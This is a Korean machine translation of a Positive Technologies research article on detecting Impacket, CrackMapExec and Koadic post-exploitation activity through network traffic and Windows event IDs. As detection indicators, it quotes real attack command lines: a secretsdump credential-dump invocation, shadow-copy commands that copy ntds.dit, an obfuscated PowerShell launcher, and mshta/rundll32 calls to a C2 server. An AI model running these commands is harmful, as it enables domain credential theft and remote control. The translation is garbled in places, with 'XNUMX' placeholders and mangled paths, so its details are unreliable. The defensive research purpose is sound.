Windows 인프라에 대한 공격을 탐지하는 방법: 해커 도구 탐색

기업 부문의 공격 건수는 매년 증가하고 있습니다. 예를 들어 2017년에는 고유 사건이 13% 더 많이 기록되었습니다. 2016년보다, 그리고 2018년 말 - 사고 발생률 27% 증가이전 기간보다. 주요 작업 도구가 Windows 운영 체제인 도구도 포함됩니다. 2017~2018년에는 APT 드래곤플라이, APT28, APT 머디워터 유럽, 북미, 사우디아라비아의 정부와 군사 조직을 공격했습니다. 이를 위해 우리는 세 가지 도구를 사용했습니다. 임패킷, 크랙맵 실행 и 코아딕. 소스 코드는 공개되어 있으며 GitHub에서 사용할 수 있습니다.

이러한 도구는 초기 침투에 사용되지 않고 인프라 내에서 공격을 개발하는 데 사용된다는 점은 주목할 가치가 있습니다. 공격자는 경계 침투 이후 다양한 공격 단계에서 이를 사용합니다. 그건 그렇고, 이것은 감지하기 어렵고 종종 기술의 도움을 통해서만 가능합니다. 네트워크 트래픽의 손상 흔적 식별 또는 이를 가능하게 하는 도구 공격자가 인프라에 침투한 후 공격자의 활성 활동을 탐지합니다.. 이 도구는 파일 전송부터 레지스트리와의 상호 작용 및 원격 시스템에서 명령 실행에 이르기까지 다양한 기능을 제공합니다. 우리는 네트워크 활동을 확인하기 위해 이러한 도구에 대한 연구를 수행했습니다.

우리가 해야 할 일:

• 해킹 도구의 작동 방식 이해. 공격자가 악용해야 할 사항과 사용할 수 있는 기술이 무엇인지 알아보세요.
• 공격 초기 단계에서 정보 보안 도구로 탐지되지 않은 내용을 찾아보세요.. 공격자가 내부 공격자이거나 공격자가 이전에 알려지지 않았던 인프라의 허점을 악용하고 있기 때문에 정찰 단계를 건너뛸 수 있습니다. 그의 행동의 전체 체인을 복원하는 것이 가능해 지므로 추가 움직임을 감지하려는 욕구가 생깁니다.
• 침입 탐지 도구에서 오탐지 제거. 정찰만으로 특정 동작이 감지되면 빈번한 오류가 발생할 수 있다는 점을 잊지 말아야 합니다. 일반적으로 인프라에는 정보를 얻기 위한 충분한 수의 방법이 있으며 언뜻 보면 합법적인 방법과 구별할 수 없습니다.

이러한 도구는 공격자에게 무엇을 제공합니까? 이것이 Impacket이라면 공격자는 경계를 무너뜨린 후 이어지는 공격의 다양한 단계에서 사용할 수 있는 대규모 모듈 라이브러리를 받게 됩니다. Metasploit과 같은 많은 도구는 Impacket 모듈을 내부적으로 사용합니다. 원격 명령 실행을 위한 dcomexec 및 wmiexec, Impacket에서 추가된 메모리에서 계정을 가져오기 위한 secretsdump가 있습니다. 결과적으로, 그러한 라이브러리의 활동을 올바르게 감지하면 파생 상품도 감지될 수 있습니다.

제작자가 CrackMapExec(또는 간단히 CME)에 대해 "Powered by Impacket"을 쓴 것은 우연이 아닙니다. 또한 CME에는 비밀번호 또는 해시를 얻기 위한 Mimikatz, 원격 실행을 위한 Meterpreter 또는 Empire 에이전트 구현, Bloodhound 탑재 등 널리 사용되는 시나리오를 위한 기성 기능이 있습니다.

우리가 선택한 세 번째 도구는 Koadic이었습니다. 이는 매우 최근의 것으로 25년 국제 해커 컨퍼런스 DEFCON 2017에서 발표되었으며 비표준 접근 방식으로 구별됩니다. 이는 HTTP, Java Script 및 Microsoft Visual Basic Script(VBS)를 통해 작동합니다. 이 접근 방식을 Living off the land라고 합니다. 이 도구는 Windows에 내장된 종속성 및 라이브러리 세트를 사용합니다. 제작자는 이를 COM Command & Control 또는 C3이라고 부릅니다.

충격

Impacket의 기능은 AD 내부 정찰, 내부 MS SQL 서버에서 데이터 수집, 자격 증명 획득 기술(SMB 릴레이 공격, 도메인 컨트롤러에서 사용자 비밀번호 해시가 포함된 ntds.dit 파일 획득)에 이르기까지 매우 광범위합니다. 또한 Impacket은 WMI, Windows 스케줄러 관리 서비스, DCOM 및 SMB의 네 가지 방법을 사용하여 원격으로 명령을 실행하며 이를 위해서는 자격 증명이 필요합니다.

비밀 덤프

secretsdump를 살펴보겠습니다. 이는 사용자 컴퓨터와 도메인 컨트롤러를 모두 대상으로 할 수 있는 모듈입니다. LSA, SAM, SECURITY, NTDS.dit 메모리 영역의 복사본을 얻는 데 사용할 수 있으므로 공격의 다양한 단계에서 볼 수 있습니다. 모듈 작업의 첫 번째 단계는 SMB를 통한 인증으로, Pass the Hash 공격을 자동으로 수행하려면 사용자의 비밀번호나 해시가 필요합니다. 다음으로 SCM(서비스 제어 관리자)에 대한 액세스를 열고 winreg 프로토콜을 통해 레지스트리에 액세스하라는 요청이 나옵니다. 이를 사용하여 공격자는 관심 있는 분기의 데이터를 찾고 SMB를 통해 결과를 얻을 수 있습니다.

그림에서. 1에서는 winreg 프로토콜을 사용할 때 LSA가 있는 레지스트리 키를 사용하여 액세스하는 방법을 정확히 확인합니다. 이렇게 하려면 opcode 15 - OpenKey와 함께 DCERPC 명령을 사용하십시오.

쌀. 1. winreg 프로토콜을 사용하여 레지스트리 키 열기

다음으로 키에 대한 액세스가 획득되면 Opcode 20과 함께 SaveKey 명령을 사용하여 값이 저장됩니다. Impacket은 이를 매우 구체적인 방식으로 수행합니다. .tmp가 추가된 임의의 8개 문자로 구성된 문자열 이름을 가진 파일에 값을 저장합니다. 또한 이 파일은 System32 디렉터리에서 SMB를 통해 추가로 업로드됩니다(그림 2).

쌀. 2. 원격 시스템에서 레지스트리 키를 얻는 방법

네트워크에서의 이러한 활동은 winreg 프로토콜, 특정 이름, 명령 및 순서를 사용하여 특정 레지스트리 분기에 대한 쿼리를 통해 감지할 수 있는 것으로 나타났습니다.

또한 이 모듈은 Windows 이벤트 로그에 추적을 남기므로 쉽게 감지할 수 있습니다. 예를 들어, 명령을 실행한 결과

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Windows Server 2016 로그에는 다음과 같은 주요 이벤트 순서가 표시됩니다.

1. 4624 - 원격 로그온.
2. 5145 - winreg 원격 서비스에 대한 액세스 권한을 확인합니다.
3. 5145 - System32 디렉터리에서 파일 액세스 권한을 확인합니다. 파일에는 위에서 언급한 임의의 이름이 있습니다.
4. 4688 - vssadmin을 시작하는 cmd.exe 프로세스 생성:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - 다음 명령을 사용하여 프로세스를 생성합니다.

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - 다음 명령을 사용하여 프로세스를 생성합니다.

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - 다음 명령을 사용하여 프로세스를 생성합니다.

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

스엠벡섹

많은 공격 후 도구와 마찬가지로 Impacket에는 명령을 원격으로 실행하기 위한 모듈이 있습니다. 원격 시스템에서 대화형 명령 셸을 제공하는 smbexec에 중점을 둘 것입니다. 이 모듈에는 비밀번호 또는 비밀번호 해시를 사용하여 SMB를 통한 인증도 필요합니다. 그림에서. 그림 3에서는 이러한 도구의 작동 방식에 대한 예를 볼 수 있습니다. 이 경우에는 로컬 관리자 콘솔입니다.

쌀. 3. 대화형 smbexec 콘솔

인증 후 smbexec의 첫 번째 단계는 OpenSCManagerW 명령(15)을 사용하여 SCM을 여는 것입니다. 쿼리는 주목할 만합니다. MachineName 필드는 DUMMY입니다.

쌀. 4. 서비스 제어 관리자 열기 요청

다음으로 CreateServiceW 명령(12)을 사용하여 서비스가 생성됩니다. smbexec의 경우 매번 동일한 명령 구성 논리를 볼 수 있습니다. 그림에서. 5 녹색은 변경할 수 없는 명령 매개변수를 나타내고 노란색은 공격자가 변경할 수 있는 항목을 나타냅니다. 실행 파일의 이름, 해당 디렉터리 및 출력 파일을 변경할 수 있다는 것은 쉽게 알 수 있지만 Impacket 모듈의 논리를 방해하지 않고 나머지는 변경하기가 훨씬 어렵습니다.

쌀. 5. Service Control Manager를 이용하여 서비스 생성 요청

Smbexec은 또한 Windows 이벤트 로그에 명백한 흔적을 남깁니다. ipconfig 명령을 사용하는 대화형 명령 셸에 대한 Windows Server 2016 로그에는 다음과 같은 주요 이벤트 시퀀스가 ​​표시됩니다.

1. 4697 — 피해자의 컴퓨터에 서비스 설치:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - 지점 1의 인수를 사용하여 cmd.exe 프로세스를 생성합니다.
3. 5145 - C$ 디렉터리의 __output 파일에 대한 액세스 권한을 확인합니다.
4. 4697 — 피해자의 컴퓨터에 서비스 설치.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - 지점 4의 인수를 사용하여 cmd.exe 프로세스를 생성합니다.
6. 5145 - C$ 디렉터리의 __output 파일에 대한 액세스 권한을 확인합니다.

Impacket은 공격 도구 개발의 기반이 됩니다. 이는 Windows 인프라의 거의 모든 프로토콜을 지원하는 동시에 고유한 특징을 가지고 있습니다. 여기에는 특정 winreg 요청, 특징적인 명령 구성을 갖춘 SCM API 사용, 파일 이름 형식, SMB 공유 SYSTEM32가 나와 있습니다.

CRACKMAPEXEC

CME 도구는 주로 공격자가 네트워크 내에서 발전하기 위해 수행해야 하는 일상적인 작업을 자동화하도록 설계되었습니다. 이를 통해 잘 알려진 Empire 에이전트 및 Meterpreter와 함께 작업할 수 있습니다. 명령을 은밀하게 실행하기 위해 CME는 명령을 난독화할 수 있습니다. 공격자는 Bloodhound(별도 정찰 도구)를 사용하여 활성 도메인 관리자 세션 검색을 자동화할 수 있습니다.

블러드 하운드

독립형 도구인 Bloodhound를 사용하면 네트워크 내에서 고급 정찰이 가능합니다. 사용자, 컴퓨터, 그룹, 세션에 대한 데이터를 수집하며 PowerShell 스크립트 또는 바이너리 파일로 제공됩니다. 정보를 수집하는 데는 LDAP 또는 SMB 기반 프로토콜이 사용됩니다. CME 통합 모듈을 사용하면 Bloodhound를 피해자의 컴퓨터에 다운로드하고 실행한 후 수집된 데이터를 실행하고 수신할 수 있으므로 시스템의 작업을 자동화하고 눈에 띄지 않게 만들 수 있습니다. Bloodhound 그래픽 셸은 수집된 데이터를 그래프 형식으로 표시하므로 공격자의 컴퓨터에서 도메인 관리자까지의 최단 경로를 찾을 수 있습니다.

쌀. 6. 블러드하운드 인터페이스

피해자의 컴퓨터에서 실행하기 위해 모듈은 ATSVC 및 SMB를 사용하여 작업을 생성합니다. ATSVC는 Windows 작업 스케줄러 작업을 위한 인터페이스입니다. CME는 NetrJobAdd(1) 기능을 사용하여 네트워크를 통해 작업을 생성합니다. CME 모듈이 보내는 내용의 예가 그림 7에 나와 있습니다. XNUMX: 이것은 XML 형식의 인수 형태로 된 cmd.exe 명령 호출 및 난독화된 코드입니다.

그림 7. CME를 통해 작업 생성

실행을 위해 작업이 제출된 후 피해자의 컴퓨터는 Bloodhound 자체를 시작하며 이는 트래픽에서 볼 수 있습니다. 이 모듈은 표준 그룹, 도메인의 모든 시스템 및 사용자 목록을 얻고 SRVSVC NetSessEnum 요청을 통해 활성 사용자 세션에 대한 정보를 얻는 LDAP 쿼리가 특징입니다.

쌀. 8. SMB를 통해 활성 세션 목록 얻기

또한 감사가 활성화된 피해자 컴퓨터에서 Bloodhound를 시작하면 ID 4688(프로세스 생성) 및 프로세스 이름이 포함된 이벤트가 수반됩니다. «C:WindowsSystem32cmd.exe». 주목할만한 점은 명령줄 인수입니다.

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

enum_avproducts 모듈은 기능 및 구현 측면에서 매우 흥미롭습니다. WMI를 사용하면 WQL 쿼리 언어를 사용하여 다양한 Windows 개체에서 데이터를 검색할 수 있으며, 이는 기본적으로 이 CME 모듈에서 사용됩니다. 피해자의 컴퓨터에 설치된 보호 도구에 대해 AntiSpywareProduct 및 AntiMirusProduct 클래스에 대한 쿼리를 생성합니다. 필요한 데이터를 얻기 위해 모듈은 rootSecurityCenter2 네임스페이스에 연결한 다음 WQL 쿼리를 생성하고 응답을 받습니다. 그림에서. 그림 9는 이러한 요청과 응답의 내용을 보여줍니다. 이 예에서는 Windows Defender가 발견되었습니다.

쌀. 9. enum_avproducts 모듈의 네트워크 활동

이벤트에서 WQL 쿼리에 대한 유용한 정보를 찾을 수 있는 WMI 감사(WMI-Activity 추적)가 비활성화되는 경우가 종종 있습니다. 그러나 활성화된 경우 enum_avproducts 스크립트가 실행되면 ID 11의 이벤트가 저장되며 여기에는 요청을 보낸 사용자의 이름과 rootSecurityCenter2 네임스페이스의 이름이 포함됩니다.

각 CME 모듈에는 특정 WQL 쿼리 또는 LDAP 및 SMB의 난독화 및 Bloodhound 관련 활동을 사용하여 작업 스케줄러에서 특정 유형의 작업 생성 등 자체 아티팩트가 있습니다.

KOADIC

Koadic의 독특한 특징은 Windows에 내장된 JavaScript 및 VBScript 인터프리터를 사용한다는 것입니다. 이러한 의미에서 이는 토지에 의존하지 않고 생활하는 경향을 따릅니다. 즉, 외부 종속성이 없으며 표준 Windows 도구를 사용합니다. 감염 후 기계에 "임플란트"가 설치되어 제어가 가능하므로 이는 완전한 명령 및 제어(CnC)를 위한 도구입니다. Koadic 용어로 이러한 기계를 "좀비"라고 합니다. 피해자 측에서 전체 작업을 수행할 수 있는 권한이 부족한 경우 Koadic은 UAC 우회(User Account Control Bypass) 기술을 사용하여 권한을 높일 수 있습니다.

쌀. 10. 코아딕 쉘

피해자는 C&C 서버와의 통신을 시작해야 합니다. 이를 위해 그녀는 미리 준비된 URI에 접속하고 스테이저 중 하나를 사용하여 Koadic 본체를 수신해야 합니다. 그림에서. 그림 11은 mshta 스테이저의 예를 보여줍니다.

쌀. 11. CnC 서버와의 세션 초기화

응답 변수 WS에 따르면 WScript.Shell을 통해 실행이 이루어지며 STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE 변수에는 현재 세션의 매개 변수에 대한 주요 정보가 포함되어 있음이 분명해집니다. 이는 CnC 서버와의 HTTP 연결에서 첫 번째 요청-응답 쌍입니다. 후속 요청은 호출된 모듈(임플란트)의 기능과 직접적으로 관련됩니다. 모든 Koadic 모듈은 CnC의 활성 세션에서만 작동합니다.

미미 카츠

CME가 Bloodhound와 함께 작동하는 것처럼 Koadic은 Mimikatz와 별도의 프로그램으로 작동하며 이를 시작하는 다양한 방법이 있습니다. 다음은 Mimikatz 임플란트 다운로드를 위한 요청-응답 쌍입니다.

쌀. 12. Mimikatz를 Koadic으로 이전

요청의 URI 형식이 어떻게 변경되었는지 확인할 수 있습니다. 이제 선택한 모듈을 담당하는 csrf 변수의 값이 포함됩니다. 그녀의 이름에 주의를 기울이지 마십시오. 우리 모두는 CSRF가 일반적으로 다르게 이해된다는 것을 알고 있습니다. 응답은 Koadic 본문과 동일하며 Mimikatz 관련 코드가 추가되었습니다. 꽤 방대하니 핵심 내용을 살펴보겠습니다. 여기에는 이를 주입할 직렬화된 .NET 클래스인 base64로 인코딩된 Mimikatz 라이브러리와 Mimikatz를 실행하기 위한 인수가 있습니다. 실행 결과는 일반 텍스트로 네트워크를 통해 전송됩니다.

쌀. 13. 원격 시스템에서 Mimikatz를 실행한 결과

Exec_cmd

Koadic에는 원격으로 명령을 실행할 수 있는 모듈도 있습니다. 여기서는 동일한 URI 생성 방법과 친숙한 sid 및 csrf 변수를 볼 수 있습니다. exec_cmd 모듈의 경우 쉘 명령어를 실행할 수 있는 바디에 코드가 추가된다. 아래에는 CnC 서버의 HTTP 응답에 포함된 코드가 나와 있습니다.

쌀. 14. 임플란트 코드 exec_cmd

코드 실행에는 익숙한 WS 속성이 있는 GAWTUUGCFI 변수가 필요합니다. 도움을 받아 임플란트는 쉘을 호출하여 출력 데이터 스트림을 반환하는 shell.exec와 반환하지 않고 shell.run이라는 두 가지 코드 분기를 처리합니다.

Koadic은 일반적인 도구는 아니지만 합법적인 트래픽에서 찾을 수 있는 자체 아티팩트가 있습니다.

• HTTP 요청의 특별한 구성,
• winHttpRequests API를 사용하여,
• ActiveXObject를 통해 WScript.Shell 객체 생성,
• 큰 실행 가능 본체.

초기 연결은 스테이저에 의해 시작되므로 Windows 이벤트를 통해 해당 활동을 감지할 수 있습니다. mshta의 경우 이는 시작 속성이 있는 프로세스 생성을 나타내는 이벤트 4688입니다.

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Koadic이 실행되는 동안 이를 완벽하게 특성화하는 속성을 가진 다른 4688 이벤트를 볼 수 있습니다.

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

조사 결과

토지에서 생활하는 경향이 범죄자들 사이에서 인기를 얻고 있습니다. 그들은 필요에 따라 Windows에 내장된 도구와 메커니즘을 사용합니다. 이 원칙을 따르는 인기 도구인 Koadic, CrackMapExec 및 Impacket이 APT 보고서에 점점 더 많이 등장하고 있습니다. 이러한 도구에 대한 GitHub의 포크 수도 증가하고 있으며 새로운 포크가 나타나고 있습니다(현재 이미 약 XNUMX개가 있습니다). 이 추세는 단순성으로 인해 인기를 얻고 있습니다. 공격자에게는 타사 도구가 필요하지 않습니다. 타사 도구는 이미 피해자의 컴퓨터에 존재하며 보안 조치를 우회하도록 도와줍니다. 우리는 네트워크 통신 연구에 중점을 두고 있습니다. 위에 설명된 각 도구는 네트워크 트래픽에 고유한 흔적을 남깁니다. 이에 대한 자세한 연구를 통해 우리는 제품을 가르칠 수 있었습니다. PT 네트워크 공격 발견 이를 탐지하면 궁극적으로 이와 관련된 전체 사이버 사고 체인을 조사하는 데 도움이 됩니다.

저자:

• Anton Tyurin, Positive Technologies의 PT Expert Security Center 전문 서비스 부서 책임자
• Egor Podmokov, 전문가, PT Expert Security Center, Positive Technologies

출처 : habr.com